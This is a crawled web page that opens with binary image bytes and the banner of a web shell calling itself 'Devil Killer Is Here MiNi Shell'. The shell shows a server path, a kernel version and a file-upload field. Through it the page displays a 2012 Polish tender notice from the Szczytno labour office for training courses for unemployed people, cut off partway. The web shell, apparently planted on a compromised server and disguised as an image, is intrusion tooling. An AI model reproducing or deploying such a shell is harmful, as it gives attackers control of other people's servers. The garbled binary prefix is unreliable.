JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120926/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120926/367472-N-2012.html

<p class="kh_header"><b>Szczytno: Usługa szkoleniowa dla skierowanych osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Szczytnie.</b><br>
<b>Numer ogłoszenia: 367472 - 2012; data zamieszczenia: 26.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Szczytnie , ul. Ogrodowa 17, 12-100 Szczytno, woj. warmińsko-mazurskie, tel. 0-89 6243287, faks 0-89 6243287.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.pup.szczytno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa szkoleniowa dla skierowanych osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Szczytnie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa szkoleniowa dla skierowanych osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Szczytnie.
Zamówienie publiczne zalicza się do usług o charakterze niepriorytetowym, zgodnie 
z Rozporządzeniem Prezesa Rady Ministrów z dnia 28 stycznia 2010 r. w sprawie wykazu usług o charakterze priorytetowym i niepriorytetowym (Dz. U. z 2010 r. Nr 12, poz. 68).
W ramach zamówienia publicznego podzielonego na części zostaną przeprowadzone trzy szkolenia w następujących kierunkach:
1)	KURS ZAWODU - OPIEKUNKA DZIECIĘCA, 
2)	KURS ZAWODU - SPRZEDAWCA Z OBSŁUGĄ KOMPUTERA I KASY FISKALNEJ,
3)	KURS ZAWODU - MAGAZYNIER Z OBSŁUGĄ KOMPUTERA I Z UPRAWNIENIAMI  
        DO OBSŁUGI WÓZKÓW JEZDNIOWYCH.
Zamówienie dotyczy organizacji i przeprowadzenia trzech różnych tematycznie 
szkoleń, łącznie dla 40 osób bezrobotnych. Zamówienie publiczne zostało podzielone na trzy części, z czego każda część stanowi odrębnie zorganizowane szkolenie. Dopuszcza się składanie ofert częściowych na wybraną część zamówienia (na wybrany kierunek szkolenia). Każda część będzie oddzielnie oceniana..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia warunek posiadania uprawnień do zorganizowania 
i przeprowadzenia szkolenia objętego niniejszym zamówieniem (w szczególności, 
że jest instytucją szkoleniową w rozumieniu ustawy z dnia 20 kwietnia 2004 r. 
o promocji zatrudnienia i instytucjach rynku pracy - tekst jednolity: Dz. U. z 2008 r. Nr 69, poz. 415 z późn. zm.), tj. posiada wpis do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej, Zamawiający wymaga od Wykonawcy złożenia oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp - zgodnie ze wzorem treści przedstawionym w załączniku nr 2 do SIWZ.
Posiadanie przez instytucję szkoleniową aktualnego wpisu do rejestru instytucji szkoleniowych Zamawiający sprawdzi w centralnym rejestrze instytucji szkoleniowych, dostępnym na stronie internetowej www.ris.praca.gov.pl</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia, Zamawiający wymaga od Wykonawcy złożenia oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp - zgodnie ze wzorem treści przedstawionym w załączniku nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia powyższy warunek, Zamawiający wymaga, 
aby Wykonawca wykazał, że dysponuje lub będzie dysponował co najmniej następującym sprzętem niezbędnym do wykonania zamówienia:
I część: Kurs zawodu - opiekunka dziecięca	
Zapewnienie do zajęć: 
1) dydaktycznych:
-	odpowiednio oświetlonej, przestronnej i odpowiednio przystosowanej sali dydaktycznej o powierzchni co najmniej 40 m2,
-	wyposażenia sali dydaktycznej w projektor multimedialny, ekran lub telewizor, tablicę lub flip-chart.
II część: Kurs zawodu - sprzedawca z obsługą kasy fiskalnej	
Zapewnienie do zajęć: 
1) dydaktycznych:
-	odpowiednio oświetlonej, przestronnej i odpowiednio przystosowanej sali dydaktycznej o powierzchni co najmniej 40 m2,
-	wyposażenia sali dydaktycznej w projektor multimedialny, ekran lub telewizor, tablicę lub flip-chart.
2) praktycznych:
- dwóch pracowni komputerowych, z czego każda wyposażona w minimum 10 komputerów + 1 komputer dla instruktora zajęć, aby każdy uczestnik szkolenia miał zapewnione samodzielne stanowisko komputerowe (łącznie minimum 22 komputery), 
-  minimum 10 kas fiskalnych, aby podczas zajęć praktycznych na jedną kasę przypadały maksymalnie dwie osoby (kupujący-sprzedający).
III część: Kurs zawodu - magazynier z obsługą komputera i z uprawnieniami do obsługi wózków jezdniowych	
Zapewnienie do zajęć: 
1) dydaktycznych:
-	odpowiednio oświetlonej, przestronnej i odpowiednio przystosowanej sali dydaktycznej o powierzchni co najmniej 40 m2,
-	wyposażenia sali dydaktycznej w projektor multimedialny, ekran lub telewizor, tablicę lub flip-chart.
2) praktycznych:
-  pracowni komputerowej wyposażonej w minimum 10 komputerów + 1 komputer dla instruktora zajęć, aby każdy uczestnik szkolenia miał zapewnione samodzielne stanowisko komputerowe (łącznie minimum 11 komputerów),
-  minimum 3 wózków jezdniowych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia powyższy warunek, Zamawiający wymaga, 
aby Wykonawca wykazał, że dysponuje lub będzie dysponował co najmniej następującymi osobami zdolnymi do wykonania zamówienia o następujących kwalifikacjach i doświadczeniu (niniejsze warunki udziału należy spełniać łącznie):
I część: Kurs zawodu - opiekunka dziecięca
- posiadanie przez każdego wykładowcę, trenera, instruktora wykształcenia minimum wyższego zawodowego lub studiów podyplomowych bądź kursu zawodowego - zgodnych z kierunkiem szkolenia lub z prowadzonym przedmiotem, za wyjątkiem treningu umiejętności osobistych, do przeprowadzenia którego należy zapewnić trenera, trenerów rozwoju osobistego posiadającego certyfikat lub akredytację wydane przez jedną z wymienionych niżej organizacji certyfikujących lub akredytujących coachów, tj.:
-	ICC (International Coaching Community),
-	ICF (International Coach Federation),
-	IIC (International Institute of Coaching),
-      EMCC (European Mentoring and Coaching Council),
lub posiadających uprawnienia trenerskie, lub ukończone studia podyplomowe z zakresu coachingu.
- posiadanie przez każdego wykładowcę, trenera, instruktora co najmniej 3-letniego doświadczenia zawodowego w okresie ostatnich 5 lat przed upływem terminu składania ofert, zgodnego z kierunkiem szkolenia lub z prowadzonym przedmiotem,
- posiadanie przez każdego wykładowcę, trenera, instruktora doświadczenia 
w prowadzeniu zajęć w formach pozaszkolnych dla osób dorosłych, polegającego na przeprowadzeniu minimum 200 godzin szkoleniowych w okresie ostatnich 3 lat przed upływem terminu składania ofert. 
Powyższy warunek nie dotyczy instruktorów, opiekunów do zajęć praktycznych w zaproponowanych placówkach zajmujących się opieką nad małymi dziećmi.
II część: Kurs zawodu - sprzedawca z obsługą kasy fiskalnej oraz
III część: Kurs zawodu - magazynier z obsługą komputera i z uprawnieniami do obsługi wózków jezdniowych
- posiadanie przez każdego wykładowcę, trenera, instruktora wykształcenia minimum wyższego zawodowego lub studiów podyplomowych bądź kursu zawodowego - zgodnych z kierunkiem szkolenia lub z prowadzonym przedmiotem, 
za wyjątkiem treningu umiejętności osobistych, do przeprowadzenia którego należy zapewnić trenera, trenerów rozwoju osobistego posiadających certyfikat lub akredytację wydane przez jedną z wymienionych niżej organizacji certyfikujących lub akredytujących coachów, tj.:
-	ICC (International Coaching Community),
-	ICF (International Coach Federation),
-	IIC (International Institute of Coaching),
-	EMCC (European Mentoring and Coaching Council),
lub posiadających uprawnienia trenerskie, lub ukończone studia podyplomowe z zakresu coachingu.
- posiadanie przez każdego wykładowcę, instruktora co najmniej 3-letniego doświadczenia zawodowego w okresie ostatnich 5 lat przed upływem terminu składania ofert, zgodnego z kierunkiem szkolenia lub z prowadzonym przedmiotem,
- posiadanie przez każdego wykładowcę, trenera, instruktora doświadczenia 
w prowadzeniu zajęć w formach pozaszkolnych dla osób dorosłych, polegającego na przeprowadzeniu minimum 200 godzin szkoleniowych w okresie ostatnich 3 lat przed upływem terminu składania ofert.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia warunek znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Zamawiający wymaga od Wykonawcy złożenia oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Pzp - zgodnie ze wzorem treści przedstawionym w załączniku nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 40.0</li>
<li>2 - Program szkolenia i metodyka nauczania - 20.0</li>
<li>3 - Kwalifikacje kadry dydaktycznej - 20.0</li>
<li>4 - Baza lokalowa, jej wyposażenie, materiały i pomoce dydaktyczne - 15.0</li>
<li>5 - Akredytacja kuratora oświaty na oceniany kierunek szkolenia - 5.0</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W oparciu o art. 144 ust. 1 ustawy Pzp Zamawiający określa następujące okoliczności, które mogą powodować konieczność wprowadzenia istotnych zmian w treści zawartej umowy w stosunku do treści złożonej oferty: 
1) zmiana terminu realizacji zamówienia z przyczyn nie leżących po stronie Wykonawcy, np. w przypadku problemów z rekrutacją kandydatów na szkolenie;
2) zmiana liczby osób objętych szkoleniem w stosunku do planowanej liczby podanej w specyfikacji w przypadku problemów z rekrutacją kandydatów na szkolenie, jednakże liczba uczestników nie może być mniejsza niż 10 osób i nie większa niż 20 osób;
3) zmiana ogólnego kosztu szkolenia przysługującego instytucji szkoleniowej w przypadku zmiany liczby osób bezrobotnych objętych szkoleniem (o którym mowa powyżej), przy zachowaniu jednostkowej ceny szkolenia podanej w ofercie szkolenia;
4) zmiana kadry dydaktycznej zaangażowanej w realizację szkolenia, wyłącznie 
w przypadku wystąpienia udokumentowanych nadzwyczajnych okoliczności uniemożliwiających prowadzenie zajęć szkoleniowych przez wskazanego w ofercie wykładowcę, trenera, instruktora (w szczególności z powodu choroby, wypadku 
czy śmieci osoby), pod warunkiem złożenia przez Wykonawcę pisemnego wniosku     w tej sprawie i po akceptacji przez Zamawiającego. 
W takim przypadku zaproponowana osoba powinna posiadać - na dzień składania ofert - co najmniej takie same kwalifikacje i doświadczenie zawodowe jak wykładowca zastępowany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.szczytno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy
ul. Ogrodowa 17, 12-100 Szczytno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.10.2012 godzina 13:00, miejsce: Powiatowy Urząd Pracy
ul. Ogrodowa 17, 12-100 Szczytno 
sekretariat - pokój nr 13 (II piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenia dla osób bezrobotnych będą realizowane w ramach projektu NOWE  PERSPEKTYWY, współfinansowanego przez Unię Europejską ze środków               Europejskiego Funduszu Społecznego - w ramach Poddziałania 6.1.3 Programu  
Operacyjnego Kapitał Ludzki Poprawa zdolności do zatrudnienia oraz podnoszenie  
poziomu aktywności zawodowej osób bezrobotnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> KURS ZAWODU - OPIEKUNKA DZIECIĘCA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia jest przygotowanie uczestników szkolenia do wykonywania zawodu opiekunki dziecięcej w zakresie:
-  udział w wychowaniu małego dziecka,
-  pielęgnacja i żywienie małego dziecka,
-  towarzyszenie w rozwoju dziecka.
Program szkolenia powinien zawierać obowiązkowo:
I. Trening umiejętności osobistych, w tym trening:
  - motywacyjny,
  - asertywności,
  - zarządzania sobą w czasie i efektywnej organizacji czasu pracy,
  - współpracy w zespole,
  - zarządzania emocjami i stresem.
Łącznie zagadnienia te powinny obejmować 18 godzin (6 godz. razy 3 dni).
UWAGA!  Trening umiejętności osobistych powinien zostać przeprowadzony na początku szkolenia, tj. przed przystąpieniem do realizacji pozostałych modułów tematycznych, w celu integracji grupy szkoleniowej i wzmocnienia motywacji 
do aktywnego uczestnictwa w szkoleniu. Trening umiejętności osobistych powinien być przeprowadzony przez trenera, trenerów rozwoju osobistego - posiadających certyfikat, akredytację coacha lub uprawnienia trenerskie, lub ukończone studia podyplomowe z zakresu coachingu.
II.   Zagadnienia teoretyczne niezbędne do pracy w zawodzie opiekunki dziecięcej, w tym:
BLOKI TEMATYCZNE:	Liczba godzin
Stosowanie wybranych form komunikacji interpersonalnej oraz metod poznawania dziecka	25
Określanie potrzeb dziecka i sposobów ich zaspokajania	50
Stosowanie podstawowych zasad i metod wychowania	15
Wychowanie dziecka w środowisku instytucjonalnym	15
Stosowanie wybranych zabaw i gier wpływających na rozwój dziecka	45
Utrzymywanie w czystości skóry dziecka i jego otoczenia	8
Zaspokajanie podstawowych potrzeb fizjologicznych dziecka	7
Udzielanie pierwszej pomocy przedlekarskiej w stanach zagrożenia i zapobieganie urazowości	10
Pomaganie w wykonywaniu pomiarów podstawowych parametrów życiowych i zapobieganie chorobom	5
Łącznie zagadnienia te powinny obejmować 180 godzin.
III.  Zajęcia praktyczne w naturalnym środowisku pracy opiekunki dziecięcej, głównie w żłobkach, przedszkolach, domach dziecka oraz w innych placówkach zajmujących się opieką nad małymi dziećmi (maksymalnie w wieku przedszkolnym) - 40 godzin (8 godz. razy 5 dni).
Zajęcia praktyczne powinny odbywać się w grupach liczbowo dostosowanych do wielkości i warunków wybranych placówek zajmujących się opieką nad małymi dziećmi, zapewniających indywidualne podejście do kursanta. Należy zapewnić optymalną ilość oraz odpowiednią jakość bazy do realizacji zajęć praktycznych, dostosowaną do liczby uczestników szkolenia. Należy zapewnić kadrę dydaktyczną w zakresie instruktorów, opiekunów do zajęć praktycznych w zaproponowanych   
placówkach zajmujących się opieką nad małymi dziećmi.
IV. Egzamin wewnętrzny - 2 godziny..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40.0</li>
<li>2. Program szkolenia i metodyka nauczania - 20.0</li>
<li>3. Kwalifikacje kadry dydaktycznej - 20.0</li>
<li>4. Baza lokalowa, jej wyposażenie, materiały i pomoce dydaktyczne - 15.0</li>
<li>5. Akredytacja kuratora oświaty na oceniany kierunek szkolenia - 5.0</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> KURS ZAWODU - SPRZEDAWCA Z OBSŁUGĄ KOMPUTERA I KASY FISKALNEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Celem szkolenia jest uzyskanie przez osoby bezrobotne kwalifikacji zawodowych w zawodzie sprzedawcy z obsługą komputera i kasy fiskalnej.
Zakres tematyczny szkolenia powinien obejmować obowiązkowo:
I. Trening umiejętności osobistych, w tym trening:
  - motywacyjny,
  - asertywności,
  - zarządzania sobą w czasie i efektywnej organizacji czasu pracy,
  - współpracy w zespole,
  - zarządzania emocjami i stresem.
Łącznie zagadnienia te powinny obejmować 18 godzin (6 godz. razy 3 dni).
UWAGA!  Trening umiejętności osobistych powinien zostać przeprowadzony na początku szkolenia, tj. przed przystąpieniem do realizacji pozostałych modułów tematycznych, w celu integracji grupy szkoleniowej i wzmocnienia motywacji 
do aktywnego uczestnictwa w szkoleniu. Trening umiejętności osobistych powinien być przeprowadzony przez trenera, trenerów rozwoju osobistego - posiadających certyfikat, akredytację coacha lub uprawnienia trenerskie, lub ukończone studia podyplomowe z zakresu coachingu.
II. Aktualne zagadnienia obejmujące wiedzę i umiejętności praktyczne w zawodzie sprzedawcy, w tym: 
1)	przestrzeganie zasad bezpieczeństwa i higieny pracy w jednostce handlowej;
